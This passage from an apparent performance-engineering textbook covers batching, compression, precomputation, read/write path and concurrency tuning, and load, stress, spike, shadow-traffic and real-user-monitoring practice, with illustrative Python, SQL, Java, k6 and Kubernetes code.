SELECT * FROM users WHERE id=1 SELECT * FROM users WHERE id IN (...)
SELECT * FROM users WHERE id=2
... 100 more round trips 2 round trips total
100 * 1.2 ms = 120 ms 1.2 ms + 3 ms = 4.2 ms
Coalescing is batching's sibling for duplicate work: when many callers ask for the same thing at once, do the work once and share the answer. This is what prevents a cache expiry from becoming a stampede against the database (5.2).
import asyncio
from collections import defaultdict
class Batcher:
"""Collects keys for a few milliseconds, then issues one bulk load."""
def __init__(self, bulk_load, max_batch=100, window_ms=5):
self._bulk_load, self._max_batch, self._window = bulk_load, max_batch, window_ms / 1000
self._pending: dict[str, asyncio.Future] = {}
self._timer: asyncio.Task | None = None
async def load(self, key: str):
if key in self._pending:
return await self._pending[key] # COALESCING: share the in-flight call
fut = asyncio.get_running_loop().create_future()
self._pending[key] = fut
if len(self._pending) >= self._max_batch:
await self._flush() # size trigger: batch is full
elif self._timer is None:
self._timer = asyncio.create_task(self._after_window()) # time trigger
return await fut
async def _after_window(self):
await asyncio.sleep(self._window) # bounded added latency
await self._flush()
async def _flush(self):
batch, self._pending = self._pending, {}
if self._timer:
self._timer.cancel()
self._timer = None
try:
results = await self._bulk_load(list(batch)) # ONE round trip
for key, fut in batch.items():
fut.set_result(results.get(key))
except Exception as exc:
for fut in batch.values(): # never leave callers hanging
fut.set_exception(exc)
async def bulk_load_users(ids: list[str]) -> dict:
rows = await db.fetch("SELECT * FROM users WHERE id = ANY($1)", ids)
return {r["id"]: r for r in rows}
users = Batcher(bulk_load_users)
# 100 concurrent calls to users.load(...) become one query with <= 5 ms added latency.
Every batch needs both a size trigger and a time trigger. Size alone means the last few items wait forever during a traffic lull; time alone means a burst builds an unbounded batch. The time window is a deliberate latency-for- throughput trade: 5 ms of added latency to remove 99 round trips is nearly always right, while 500 ms is not.
| Layer | Batching mechanism | Typical win |
|---|---|---|
| Database reads | IN (...), bulk loaders | Removes N+1 round trips |
| Database writes | Multi-row INSERT, COPY | One flush amortised over rows |
| Message queues (7.1) | Producer batching, linger.ms | Fewer network and broker calls |
| RPC | Bulk endpoints, request pipelining | Fewer headers, handshakes |
| Logs and metrics | Buffered async export | Removes I/O from the hot path |
Batching has real costs to weigh: added latency for the first item, larger blast radius if a batch fails (one poison item can fail 100), memory held while the batch fills, and harder retry semantics — a partial failure needs per-item results, not one exception.
Key Takeaways
- Batching amortises fixed per-operation cost; it wins whenever overhead dominates the work itself.
- Always combine a size trigger with a time trigger, and keep the window small.
- Coalescing deduplicates concurrent identical requests — the standard defence against cache stampedes.
- Batches enlarge the blast radius of a failure; return per-item results so retries stay precise.
- The N+1 query is the canonical batching bug; look for it in any ORM-backed list endpoint.
🧪 Practice
- Find an N+1 query in a codebase and rewrite it as a single bulk query, measuring both.
- Add a batcher with a 10 ms window in front of a hot key-value lookup and measure the change in round trips and p99.
- Interview: What is the downside of increasing a batch window from 5 ms to 100 ms? (Hint: think about who pays for the wait, and what happens to memory and failure blast radius as the batch grows.)
Compression Trade-offs
Compression trades CPU time for bytes on the wire or on disk. Whether that trade pays depends entirely on the relative cost of the two, which varies by hop: over a mobile network, sending fewer bytes is almost always worth CPU; between two services on the same rack, spending 3 ms of CPU to save 1 ms of transfer is a loss.
The rule of thumb: compress when the link is slow, expensive, or metered (internet egress, mobile clients, cross-region traffic, archival storage) and think twice when it is fast and free (same-availability-zone RPC on small payloads).
| Algorithm | Ratio | Compress speed | Decompress speed | Typical use |
|---|---|---|---|---|
| gzip | Good | Moderate | Fast | Universal HTTP default |
| brotli | Best text | Slow at high q | Fast | Static assets, precompressed |
| zstd | Good | Fast, tunable | Very fast | RPC, storage, logs — best default |
| lz4/snappy | Modest | Very fast | Very fast | Hot paths, in-memory, DB blocks |
import gzip, zstandard, json, time
payload = json.dumps([{"id": i, "name": f"user-{i}", "email": f"u{i}@example.com"}
for i in range(5000)]).encode()
def bench(name, compress):
t0 = time.perf_counter()
out = compress(payload)
ms = (time.perf_counter() - t0) * 1000
ratio = len(payload) / len(out)
# Break-even: does the time saved on the wire exceed the CPU time spent?
for mbps in (10, 100, 1000): # link speed
saved_ms = (len(payload) - len(out)) * 8 / (mbps * 1_000_000) * 1000
verdict = "WORTH IT" if saved_ms > ms else "not worth it"
print(f"{name:<12} ratio={ratio:4.1f}x cpu={ms:6.2f}ms "
f"link={mbps:>5}Mbps saved={saved_ms:6.2f}ms {verdict}")
bench("gzip-6", lambda b: gzip.compress(b, 6))
bench("zstd-3", lambda b: zstandard.ZstdCompressor(level=3).compress(b))
bench("zstd-19", lambda b: zstandard.ZstdCompressor(level=19).compress(b))
Several rules save real money and real incidents:
- Compress once for static content. Precompress assets at build time with a high, slow setting; you pay the CPU once and serve the small bytes forever. Use a fast level for dynamic responses compressed per request.
- Do not compress already-compressed data. JPEG, PNG, MP4, and ZIP payloads gain nothing and cost CPU.
- Skip tiny payloads. Below roughly 1 KB, header and framing overhead cancels the gain; most servers have a minimum-size threshold for exactly this reason.
- Choose a compact format before choosing a compressor. Protobuf or Avro (3.2) is often smaller than compressed JSON and cheaper to parse.
- Beware compression plus secrets on the same channel. CRIME/BREACH-style attacks infer secrets from compressed response sizes; do not compress responses that mix attacker-influenced input with secrets (11.3).
For storage, the calculus differs: compressed data means fewer bytes read from disk, so a compressed columnar table is frequently faster to scan than an uncompressed one, even after decompression — the disk, not the CPU, is the bottleneck.
Key Takeaways
- Compression trades CPU for bytes; whether it pays depends on link speed and cost, so decide per hop.
- zstd is the sensible modern default; lz4/snappy for hot paths, brotli for precompressed static assets.
- Precompress static content at a high level; use a fast level for dynamic responses.
- Never compress already-compressed or very small payloads.
- On storage, compression often improves read speed because I/O dominates CPU.
🧪 Practice
- Benchmark gzip, zstd-3, and zstd-19 on a representative payload and compute the break-even link speed for each.
- Configure a web server to compress responses above 1 KB, excluding images, and verify with response headers.
- Interview: When would you deliberately not compress an API response? (Hint: consider payload size, payload type, where the two endpoints sit relative to each other, and one security case.)
Precomputation and Materialization
The cheapest work in a request is work that already happened. Precomputation moves expensive computation off the request path and onto a background path, trading storage and freshness for latency.
The analogy is meal prep. Cooking to order gives maximum freshness and maximum wait; preparing dishes in advance serves instantly, at the cost of storage and food that is a few hours old. Neither is universally right — the question is how stale an answer the product can tolerate.
The main forms, ordered by how far they push the work from the request:
| Technique | What is stored | Freshness | Best when |
|---|---|---|---|
| Cached query result | The response | Seconds to minutes | Read-heavy, tolerant of staleness |
| Materialized view | A query's result table | Refresh interval | Expensive aggregations |
| Denormalized table | Pre-joined rows | Write-time | Joins dominate read cost |
| Precomputed feed/index | Per-user results | Write-time | Read amplification is extreme |
| Incremental aggregation | Running counters/rollups | Near real time | Metrics, counts, leaderboards |
-- On-demand: correct, always fresh, and far too slow for a dashboard that
-- 10 000 people open every morning.
SELECT seller_id,
date_trunc('day', created_at) AS day,
count(*) AS orders,
sum(total_cents) AS revenue_cents
FROM orders
WHERE created_at >= now() - interval '90 days'
GROUP BY 1, 2; -- scans millions of rows per page view
-- Materialized: the same query, computed once per refresh and read as a table.
CREATE MATERIALIZED VIEW seller_daily_sales AS
SELECT seller_id,
date_trunc('day', created_at) AS day,
count(*) AS orders,
sum(total_cents) AS revenue_cents
FROM orders
GROUP BY 1, 2;
CREATE UNIQUE INDEX ON seller_daily_sales (seller_id, day); -- required for
-- CONCURRENTLY, which refreshes without blocking readers:
REFRESH MATERIALIZED VIEW CONCURRENTLY seller_daily_sales;
# Incremental aggregation: update the rollup on write instead of rebuilding it.
# Cost moves from O(rows scanned per read) to O(1 per write).
async def record_order(order):
async with db.transaction(): # atomic with the write
await db.execute("INSERT INTO orders (...) VALUES (...)", ...)
await db.execute("""
INSERT INTO seller_daily_sales (seller_id, day, orders, revenue_cents)
VALUES ($1, date_trunc('day', $2), 1, $3)
ON CONFLICT (seller_id, day) DO UPDATE SET
orders = seller_daily_sales.orders + 1,
revenue_cents = seller_daily_sales.revenue_cents + EXCLUDED.revenue_cents
""", order.seller_id, order.created_at, order.total_cents)
The hard part of precomputation is never the computing — it is invalidation and correctness. Every precomputed value can drift from its source: a refresh fails silently, an incremental update is applied twice, a backfill overlaps live writes. Three defences are worth building in from the start: make incremental updates idempotent or transactional with the source write, run a periodic reconciliation job that recomputes from truth and reports drift, and record the computation time alongside the value so consumers can see how stale it is.
The related decision is precompute for everyone or only for the hot set. A social feed precomputed for every user wastes enormous effort on dormant accounts; the standard answer is hybrid — precompute for active users, compute on demand for the rest, and switch strategy for outliers such as celebrity accounts whose fan-out is pathological (15.2).
Key Takeaways
- Precomputation trades storage and freshness for latency by moving work off the request path.
- Materialized views suit expensive aggregations; incremental rollups suit near-real-time counters.
- Correctness, not computation, is the hard part — build reconciliation from day one.
- Store a computed-at timestamp so consumers can reason about staleness.
- Precompute for the hot set and fall back to on-demand for the long tail.
🧪 Practice
- Convert an expensive
GROUP BYdashboard query into a materialized view and measure both latency and refresh cost.- Implement an incremental counter update that is safe against duplicate delivery.
- Interview: How do you keep a materialized view from silently going stale? (Hint: think about what proves the refresh ran, and what proves the numbers still match the source of truth.)
Read and Write Path Optimization
Reads and writes want opposite things. Reads want data pre-joined, indexed, denormalized, and close by. Writes want a single place to write, few indexes to update, and no coordination. Every index that makes a read faster makes a write slower; every denormalized copy that removes a join adds a place to update. Optimising a system means deciding which path to favour — and often splitting them so each can be optimised independently.
Start by measuring the ratio. A system doing 100 reads per write should look very different from one doing 100 writes per read.
READ-OPTIMISED WRITE-OPTIMISED
many indexes few indexes
denormalized / pre-joined normalized, one place per fact
materialized aggregates aggregate at read time
read replicas + cache tiers single writer, append-only
B-tree (fast point lookups) LSM-tree (fast sequential writes)
cost: slower writes, storage, cost: slower reads, compaction,
consistency lag read amplification
The storage engine choice encodes this trade directly. A B-tree updates data in place — good for reads, and every write pays random I/O plus index maintenance. An LSM-tree appends to a memtable, flushes sorted files, and merges them later — excellent for writes, at the cost of read amplification and background compaction (4.1).
-- Write path: the index nobody audits.
-- Each additional index adds work to EVERY insert, update, and delete.
SELECT indexrelname,
idx_scan, -- how often it was actually used
pg_size_pretty(pg_relation_size(indexrelid)) AS size
FROM pg_stat_user_indexes
WHERE relname = 'orders'
ORDER BY idx_scan ASC; -- zero-scan indexes are pure write tax
-- Read path: a covering index answers the query from the index alone,
-- with no heap fetch at all.
CREATE INDEX idx_orders_seller_recent
ON orders (seller_id, created_at DESC)
INCLUDE (status, total_cents) -- extra columns carried in the index
WHERE status <> 'cancelled'; -- partial: smaller index, cheaper writes
# CQRS: split the paths outright. Writes go to a normalized store; a projection
# builds read models shaped exactly like the queries that serve them (10.3).
async def place_order(cmd):
order = await write_store.insert_order(cmd) # normalized, few indexes
await events.publish("order.placed", order) # async fan-out
return order.id
async def project_order_placed(event):
# One denormalized row per read pattern; each is cheap to query and
# independently rebuildable by replaying the event log.
await read_store.upsert_seller_dashboard_row(event)
await read_store.upsert_buyer_history_row(event)
async def get_buyer_history(user_id):
return await read_store.fetch_buyer_history(user_id) # no joins, one index
Splitting the paths buys independent scaling and independent schemas, and it costs eventual consistency: a user may place an order and not see it in a list that is a few hundred milliseconds behind. That is often fine, and when it is not, the standard mitigations are read-your-own-writes routing (send a user's reads to the primary briefly after their write) or optimistic UI that shows the local result while the projection catches up (8.2).
Key Takeaways
- Reads and writes pull in opposite directions; measure the read/write ratio before optimising either.
- Every index accelerates some reads and taxes every write — audit unused ones.
- Covering and partial indexes give read speed for less write cost than a plain index.
- B-trees favour reads, LSM-trees favour writes; pick the engine to match the workload.
- CQRS separates the paths completely, buying independent optimisation at the price of eventual consistency.
🧪 Practice
- List the indexes on a busy table with their scan counts and propose which to drop.
- Rewrite a slow list endpoint's query to be served by a single covering index, and verify with
EXPLAIN.- Interview: Your write throughput drops 40% after a feature launch that added no writes. What would you check? (Hint: think about what a new read feature usually adds to a table, and who pays for it on every insert.)
Concurrency and Parallelism Tuning
Concurrency is dealing with many things at once; parallelism is doing many things at once. A single-threaded event loop is concurrent but not parallel; a batch job across 16 cores is both. Getting this wrong produces two opposite failures: blocking work on an event loop starves everything else, and unbounded threads thrash the scheduler.
The first question is always what the work is waiting for:
| Workload | Bottleneck | Right model | Sizing heuristic |
|---|---|---|---|
| CPU-bound | Cycles | Threads or processes = cores | N = cores (or cores - 1) |
| I/O-bound | Network/disk wait | Async, or many more threads than cores | N = target_rps * latency (Little) |
| Mixed | Both | Separate pools per class | Size each independently |
For I/O-bound work the pool must be large enough to keep the required number of requests in flight — straight from Little's Law. For CPU-bound work, more threads than cores buys nothing and costs context switches and cache pollution.
import asyncio, os
from concurrent.futures import ProcessPoolExecutor
# Rule 1: never block the event loop. A CPU-heavy call inside an async handler
# stalls EVERY other in-flight request on that loop, not just this one.
cpu_pool = ProcessPoolExecutor(max_workers=os.cpu_count())
async def handle(request):
rows = await db.fetch(...) # I/O: yields the loop
loop = asyncio.get_running_loop()
report = await loop.run_in_executor( # CPU: pushed to processes
cpu_pool, render_pdf, rows) # loop stays responsive
return report
# Rule 2: bound concurrency toward every dependency, separately.
# One shared limit lets a slow dependency consume all the slots (9.2 bulkheads).
limits = {
"search": asyncio.Semaphore(50),
"payments": asyncio.Semaphore(10), # slow and critical: keep it isolated
"images": asyncio.Semaphore(200), # fast and non-critical
}
async def call(dependency: str, coro):
async with limits[dependency]: # queues here rather than piling up
return await coro # downstream and hiding the backpressure
// Thread pools: the bounded queue and the rejection policy are the design.
// An unbounded queue turns overload into an OutOfMemoryError and a growing
// backlog of requests whose callers have already timed out.
ThreadPoolExecutor executor = new ThreadPoolExecutor(
16, // core threads (I/O-bound sizing)
64, // max threads under burst
60L, TimeUnit.SECONDS, // idle threads above core exit
new ArrayBlockingQueue<>(200), // BOUNDED: backpressure, not memory
new ThreadPoolExecutor.CallerRunsPolicy() // on saturation, slow the producer
); // down instead of dropping silently
Two failure modes are worth naming because they recur everywhere. False
sharing happens when two threads write to different variables that live in the
same cache line, so the hardware ships the line back and forth — the USL b term
made concrete. Lock convoying happens when a lock is held across an I/O call,
so every waiter inherits that latency; the fix is to shrink the critical section
until it contains no I/O at all.
Tuning method: change one knob at a time under a realistic load test, watch throughput and latency together, and stop increasing concurrency at the point where throughput flattens but latency keeps rising. That knee is saturation; beyond it you are only lengthening queues.
Key Takeaways
- Size CPU-bound pools to core count and I/O-bound pools by Little's Law.
- Never run blocking or CPU-heavy work on an event loop; hand it to an executor.
- Bound concurrency per dependency so one slow service cannot consume every slot.
- Use bounded queues with an explicit rejection policy — unbounded queues turn overload into an outage.
- Stop increasing concurrency where throughput flattens and latency keeps climbing; that knee is saturation.
🧪 Practice
- Measure throughput and p99 for a CPU-bound task at 1, N, and 4N threads on an N-core machine and explain the shape.
- Add a per-dependency semaphore to a service that currently shares one global limit, and describe what changes during a downstream slowdown.
- Interview: An async service has excellent throughput in tests but terrible p99 in production. What would you look for? (Hint: think about what one synchronous call inside a coroutine does to every other request sharing that loop.)
<a id="133-benchmarking-and-testing"></a>
13.3 Benchmarking and Testing
Analysis tells you where time goes and optimisation removes some of it, but only testing tells you what the system does under load it has not seen yet. This subchapter covers load testing to verify expected traffic, stress and soak testing to find breaking points and slow leaks, spike testing for sudden arrivals, shadow traffic for risk-free realism, the difference between synthetic probes and real user measurement, and how to turn all of it into a defensible capacity statement.
Load Testing
A load test asks a specific, falsifiable question: does the system meet its latency and error-rate targets at an expected level of traffic? It is not "see how fast it goes" — that is benchmarking, and it produces numbers nobody can act on.
The single most common way load tests mislead is unrealistic workload. Real traffic has a mix of endpoints in particular proportions, a key distribution with hot spots, a cache that is already warm, think time between user actions, and payload sizes drawn from real data. A test that hammers one endpoint with one key measures your cache, not your system.
TEST SHAPE WHAT IT ANSWERS
load ____----'''''''''''' Does the system meet SLOs at expected peak?
ramp steady state (ramp gently: instant load tests cold caches,
not steady-state behaviour)
stress ____----''''----''''--/ Where does it break, and how?
increase until failure
soak ------------------------ Does it degrade over hours? (leaks, fragmentation)
steady, 8-24 hours
spike ___|''|______|''|_______ Can it absorb sudden arrivals and recover?
instant 10x, then drop
// k6: a load test shaped like real traffic, with pass/fail thresholds.
import http from 'k6/http';
import { check, sleep, group } from 'k6';
import { Trend } from 'k6/metrics';
const checkoutLatency = new Trend('checkout_latency');
export const options = {
stages: [
{ duration: '5m', target: 500 }, // ramp: let caches and JIT warm up
{ duration: '20m', target: 500 }, // steady state: this is the measurement
{ duration: '3m', target: 0 }, // ramp down
],
thresholds: {
// A test without thresholds is a demo. These make it a pass/fail gate.
'http_req_duration{endpoint:browse}': ['p(95)<200', 'p(99)<500'],
'http_req_duration{endpoint:checkout}': ['p(95)<800'],
'http_req_failed': ['rate<0.001'], // < 0.1% errors
},
};
export default function () {
// Endpoint MIX mirrors production: 85% browse, 12% search, 3% checkout.
const roll = Math.random();
group('user_session', () => {
if (roll < 0.85) {
// Zipfian key choice: a few products are hot, most are cold — like reality.
const id = zipfProductId();
http.get(`https://staging.shop/api/products/${id}`, { tags: { endpoint: 'browse' } });
} else if (roll < 0.97) {
http.get(`https://staging.shop/api/search?q=${randomTerm()}`, { tags: { endpoint: 'search' } });
} else {
const res = http.post('https://staging.shop/api/checkout', payload(),
{ tags: { endpoint: 'checkout' } });
check(res, { 'checkout ok': (r) => r.status === 201 });
checkoutLatency.add(res.timings.duration);
}
});
sleep(Math.random() * 3 + 1); // THINK TIME: users pause; load generators must too
}
Two methodological points separate credible tests from noise. First, open versus closed models: a closed model keeps a fixed number of virtual users who wait for a response before sending the next request, so when the system slows down, the offered load automatically drops — hiding overload. An open model sends at a fixed arrival rate regardless, which is how the internet actually behaves. Use open-model testing (k6's constant-arrival-rate executor, or equivalent) when you care about overload behaviour.
Second, coordinated omission: if your load generator waits for a slow response before scheduling the next request, the requests it never sent — the ones that would have queued during the stall — are missing from the results, and the measured p99 is far better than reality. Generators that record intended send time rather than actual send time correct for this.
A test is only meaningful against a comparable environment. Production-shaped data volumes matter more than production-shaped hardware: a query plan on 10 000 rows tells you nothing about the same query on 100 million.
Key Takeaways
- Load testing verifies SLOs at expected traffic; state thresholds up front so the test passes or fails rather than merely reporting.
- Model the real workload — endpoint mix, key skew, think time, payload sizes, warm caches.
- Prefer open-model (fixed arrival rate) generators; closed models mask overload by slowing themselves down.
- Watch for coordinated omission, which flatters tail latency.
- Data volume realism matters more than hardware parity.
🧪 Practice
- Write a load test with an endpoint mix and think time, and add p95/p99 thresholds that fail the build.
- Run the same test with a warm and a cold cache and explain the difference in p99.
- Interview: Why can a closed-model load test report healthy latency for a system that is actually overloaded? (Hint: think about who decides when the next request is sent, and what happens to offered load when responses slow.)
Stress and Soak Testing
Load testing confirms the system works at expected traffic. Stress and soak testing answer the two questions load testing cannot: what happens beyond the expected, and what happens over time.
Stress testing increases load until something breaks. The valuable output is not the breaking number but the failure mode. A system that sheds excess load, keeps serving the requests it accepted, and returns to normal when load drops has a good failure mode. A system that accepts everything, queues without bound, times out on all requests including the ones it could have served, and needs a restart to recover has a bad one — and the difference is a design decision, not luck.
GRACEFUL DEGRADATION CLIFF (BAD)
good│----____ good│--------
put │ ''----____ put │ |
│ ''----- │ |
│ sheds excess, serves the rest │ +--------- 0 (collapse)
└────────────────────────► load └────────────────► load
knee overload knee ^ everything times out,
recovery needs a restart
Soak testing runs a moderate, realistic load for hours or days to expose problems that need time to accumulate: memory leaks, unclosed file descriptors or connections, log volumes filling a disk, cache growth without eviction, thread leaks, database bloat from un-vacuumed dead tuples, and gradual index fragmentation. None of these show up in a 20-minute run.
// k6: stress to the breaking point using an OPEN model, so offered load keeps
// climbing even as the system slows down.
export const options = {
scenarios: {
stress: {
executor: 'ramping-arrival-rate', // arrival rate, not virtual users
startRate: 100, timeUnit: '1s',
preAllocatedVUs: 200, maxVUs: 5000, // enough VUs that the generator never
stages: [ // becomes the bottleneck itself
{ target: 500, duration: '5m' },
{ target: 1000, duration: '5m' },
{ target: 2000, duration: '5m' },
{ target: 4000, duration: '5m' }, // find the knee, then push past it
],
},
},
};
# Soak test analysis: the trend matters, not the absolute value. Fit a line to
# memory over the run; a positive slope that does not flatten is a leak.
import statistics
def leak_slope(samples_mb: list[float], minutes_per_sample: float) -> float:
n = len(samples_mb)
xs = [i * minutes_per_sample for i in range(n)]
mx, my = statistics.mean(xs), statistics.mean(samples_mb)
num = sum((x - mx) * (y - my) for x, y in zip(xs, samples_mb))
den = sum((x - mx) ** 2 for x in xs)
return num / den # MB per minute
slope = leak_slope([512, 528, 547, 561, 580, 599, 618, 640], minutes_per_sample=60)
print(f"{slope * 60:.1f} MB/hour") # steady climb after warm-up = leak
print(f"OOM at 4 GB in ~{(4096 - 640) / (slope * 60):.0f} hours")
During a stress test, record what breaks first, because that component is your real capacity limit and everything else is theoretical. Common first failures: connection pool exhaustion, a downstream dependency without a circuit breaker, the log pipeline, disk I/O on the database, and — frequently — the load generator itself. Then verify recovery: drop the load and confirm the system returns to normal without human intervention. A system that needs a restart after every overload will need one during every incident.
Key Takeaways
- Stress testing finds the breaking point; the failure mode matters more than the number.
- Graceful degradation means shedding excess load while continuing to serve accepted requests, then recovering unaided.
- Soak testing exposes leaks, unbounded caches, descriptor exhaustion, and disk growth that short runs cannot.
- Record which component fails first — that is your actual capacity limit.
- Always test recovery, not just failure.
🧪 Practice
- Stress a service until errors appear and document the first component to fail and how the system behaved past that point.
- Run an 8-hour soak and plot memory, descriptors, and connection counts, fitting a trend line to each.
- Interview: How would you tell a memory leak from normal cache growth in a soak test? (Hint: think about what each curve looks like over time and what a bounded cache is supposed to do at its limit.)
Spike Testing
Spike testing covers the case where load does not ramp at all: a marketing email goes out, a video goes viral, a competitor has an outage, or — the most common in practice — a dependency recovers and every client retries at once. Traffic goes from baseline to ten times baseline in seconds.
Sudden load is qualitatively harder than high load, because the mechanisms meant to help all have lag. Autoscaling needs to observe metrics, decide, provision, and boot — typically one to five minutes. Caches are cold for content nobody has requested recently. Connection pools must open new connections precisely when the database is busiest. JIT-compiled runtimes are slow until warm.
SPIKE ARRIVES capacity vs demand over time
load │ ,------------------------
│ | <- demand: instant
│ |
│ ____| <- capacity: lags by the scaling delay
│ : ____----''''''''
└──────:───────────────────────────► time
t0 t0+90s t0+3min
|<-- THE GAP -->|
Everything that protects you must work inside this window:
queueing, load shedding, cached responses, pre-warmed headroom.
# The retry storm: the most common self-inflicted spike. When a dependency
# recovers, every client that was retrying hits it simultaneously unless the
# backoff is randomised.
import random
def backoff_delay(attempt: int, base: float = 0.1, cap: float = 30.0,
jitter: str = "full") -> float:
exponential = min(cap, base * (2 ** attempt))
if jitter == "none":
return exponential # every client retries at the SAME instant
if jitter == "full":
return random.uniform(0, exponential) # spreads clients across the window
return exponential / 2 + random.uniform(0, exponential / 2) # equal jitter
# 10 000 clients, attempt 5: without jitter all 10 000 arrive at t = 3.2 s.
# With full jitter they arrive spread over 0-3.2 s: a ~3 000x lower peak rate.
# Kubernetes HPA tuned for spikes: scale out fast, scale in slowly.
# Symmetric behaviour is wrong — scaling in quickly after a spike guarantees
# you are undersized when the second wave arrives.
behavior:
scaleUp:
stabilizationWindowSeconds: 0 # react immediately
policies:
- type: Percent
value: 100 # allow doubling
periodSeconds: 30
- type: Pods
value: 10 # or +10 pods, whichever is larger
periodSeconds: 30
selectPolicy: Max
scaleDown:
stabilizationWindowSeconds: 600 # wait 10 minutes of calm before shrinking
policies:
- type: Percent
value: 10 # then shrink gently
periodSeconds: 60
The defences that actually work in the scaling gap are the ones that need no scaling: a queue that absorbs the burst and lets workers drain it at their own rate (7.1), load shedding that rejects excess quickly rather than queueing it (6.3), cached or static responses served from the edge (5.4), pre-warmed headroom before predictable spikes such as a scheduled launch, and jittered client backoff so your own clients do not manufacture the spike.
Key Takeaways
- Spike testing checks behaviour when load arrives instantly, not gradually.
- Autoscaling lags by minutes; something else must cover the gap.
- Queues, load shedding, edge caching, and pre-warming are the in-gap defences.
- Retry storms are self-inflicted spikes; full jitter on exponential backoff is the fix.
- Scale out fast and scale in slowly — symmetric autoscaling policies leave you undersized for the second wave.
🧪 Practice
- Run a test that jumps from 100 to 2 000 rps instantly and record the error rate and recovery time.
- Simulate 5 000 clients retrying with and without full jitter, and plot the arrival rate at the dependency.
- Interview: A dependency comes back after a 2-minute outage and immediately falls over again. Why? (Hint: think about what every client was doing during those two minutes and when their timers all expire.)
Shadow Traffic and Dark Launches
Synthetic load tests are approximations. Real traffic has a request mix, key skew, payload weirdness, and adversarial inputs that no generator reproduces faithfully. Shadow traffic gives you real traffic against a new system without risking a single user request.
Shadow traffic (mirroring): production requests are duplicated to a new service or version, whose responses are discarded. Users are served entirely by the existing system and never see the shadow's output — so the shadow can be wrong, slow, or crash without consequence.
Dark launch: new code is deployed and executed in production behind a flag, its results compared against the current implementation but not shown to users, until confidence is high enough to flip the flag (12.3).
+---------------------> [ PRIMARY ]-----> response to user
request -----> fork |
+- - - - - - - - - -> [ SHADOW ] response DISCARDED
(async, best effort) |
v
compare: latency, status, diff of results
import asyncio, hashlib, json, logging
async def handle_with_shadow(request):
primary = asyncio.create_task(primary_service.handle(request))
if should_shadow(request):
# Fire and forget. The shadow must NEVER add latency to or fail the
# user's request, so it is never awaited on the response path.
asyncio.create_task(run_shadow(request, primary))
return await primary
async def run_shadow(request, primary_task):
try:
shadow_req = scrub(request) # strip or fake anything with side effects:
# payment tokens, real email addresses
shadow = await asyncio.wait_for(shadow_service.handle(shadow_req), timeout=5)
primary = await primary_task
if digest(primary) != digest(shadow):
logging.warning("shadow_mismatch", extra={
"path": request.path,
"primary": digest(primary), "shadow": digest(shadow),
"diff_sample": sample_diff(primary, shadow), # bounded payload
})
except Exception:
logging.warning("shadow_failed", exc_info=True) # swallowed on purpose
def should_shadow(request) -> bool:
# Deterministic sampling: the same user always shadows, so comparisons are
# consistent across a session rather than a random half of each flow.
if request.method != "GET":
return False # start with reads: no side effects
return int(hashlib.sha256(request.user_id.encode()).hexdigest(), 16) % 100 < 5
def digest(response) -> str:
payload = normalise(response) # drop timestamps, request ids, ordering
return hashlib.sha256(json.dumps(payload, sort_keys=True).encode()).hexdigest()
The hazard that defines shadow testing is side effects. A mirrored request that charges a card, sends an email, or writes to the production database has just done a real thing twice. Before mirroring anything, the shadow must run against a separate datastore, have external calls stubbed, and be scrubbed of anything that triggers a real-world action. The safe progression is: read-only traffic first, then writes against an isolated store, then a small percentage of real traffic behind a flag (canary), then full rollout.
Shadowing costs real money — you are running the workload twice — so sample rather than mirroring everything, and turn it off once the comparison is clean.
Key Takeaways
- Shadow traffic tests a new system with real production requests while users are served entirely by the old one.
- The shadow path must be asynchronous and failure-isolated; it can never add latency or errors to the user's request.
- Side effects are the danger: scrub, stub, and use a separate datastore before mirroring anything.
- Compare normalised digests, not raw responses, or every timestamp is a mismatch.
- Sample deterministically by user, and remember you are paying for the workload twice.
🧪 Practice
- Add shadowing for 5% of GET traffic to a rewritten endpoint and log normalised response mismatches.
- List every side effect in a write endpoint and describe how each would be neutralised in a shadow.
- Interview: How do you shadow a payment service safely? (Hint: think about which calls leave your system, and what a shadow needs in place of each of them.)
Synthetic vs. Real User Monitoring
Both approaches measure performance in production, from opposite directions, and mature systems run both because each sees what the other cannot.
Synthetic monitoring runs scripted transactions from controlled locations on a schedule: hit the login page from four regions every minute, complete a checkout every five. It is a controlled experiment — same script, same place, same cadence — so any change in the number means a change in the system.
Real User Monitoring (RUM) instruments actual sessions and reports what real people experienced on their own devices and networks. It is ground truth about user experience, but it is uncontrolled: a bad number might mean your service regressed, or that a large cohort of users on slow mobile connections arrived.
| Dimension | Synthetic | RUM |
|---|---|---|
| Traffic source | Scripted probes | Real users |
| Coverage | Only the flows you scripted | Everything users actually do |
| Baseline stability | High — controlled variables | Low — device, network, geography mix |
| Works with no users | Yes (nights, pre-launch, new region) | No |
| Catches | Availability, regressions, third parties | Real device and network reality |
| Misses | Unscripted flows, real conditions | Nothing users hit; everything they do not |
| Best used for | Alerting and uptime SLOs | SLOs about experience, prioritisation |
// RUM: report real Core Web Vitals plus your own API timings from the browser.
import { onLCP, onINP, onCLS } from 'web-vitals';
function report(metric) {
const body = JSON.stringify({
name: metric.name,
value: metric.value,
rating: metric.rating, // 'good' | 'needs-improvement' | 'poor'
// Dimensions that let you SEGMENT — an aggregate p75 hides the cohort that
// is actually suffering.
connection: navigator.connection?.effectiveType, // '4g', '3g', 'slow-2g'
deviceMemory: navigator.deviceMemory,
country: window.__geo,
release: window.__release,
});
// sendBeacon survives page unload; fetch() during navigation is often dropped.
navigator.sendBeacon('/rum', body);
}
onLCP(report); // Largest Contentful Paint: when the main content appeared
onINP(report); // Interaction to Next Paint: responsiveness to input
onCLS(report); // Cumulative Layout Shift: visual stability
# Synthetic: a scheduled probe of a critical journey, run from several regions.
# Alert on the probe, investigate with RUM.
def synthetic_checkout_probe(region: str) -> dict:
t0 = time.perf_counter()
session = login(TEST_ACCOUNT) # a real, isolated test account
add_to_cart(session, TEST_SKU)
order = checkout(session, TEST_CARD_SANDBOX) # sandbox payment credentials
elapsed_ms = (time.perf_counter() - t0) * 1000
emit_metric("synthetic.checkout.duration_ms", elapsed_ms, tags={"region": region})
emit_metric("synthetic.checkout.success", 1 if order.ok else 0, tags={"region": region})
return {"ok": order.ok, "ms": elapsed_ms}
Use them together in one workflow: alert on synthetic probes because their baseline is stable and a failure is unambiguous, then use RUM to judge impact and priority — a regression affecting 2% of sessions on one browser is a different matter from one affecting every mobile user. And always segment RUM data before concluding anything: a stable overall p75 can conceal a severe regression in one country, one device class, or one release.
Key Takeaways
- Synthetic monitoring is a controlled experiment: stable baseline, good for alerting, blind to unscripted reality.
- RUM is ground truth about experience but uncontrolled and unavailable without traffic.
- Run both: alert on synthetic, prioritise and quantify with RUM.
- Always segment RUM by device, network, geography, and release — aggregates hide cohorts.
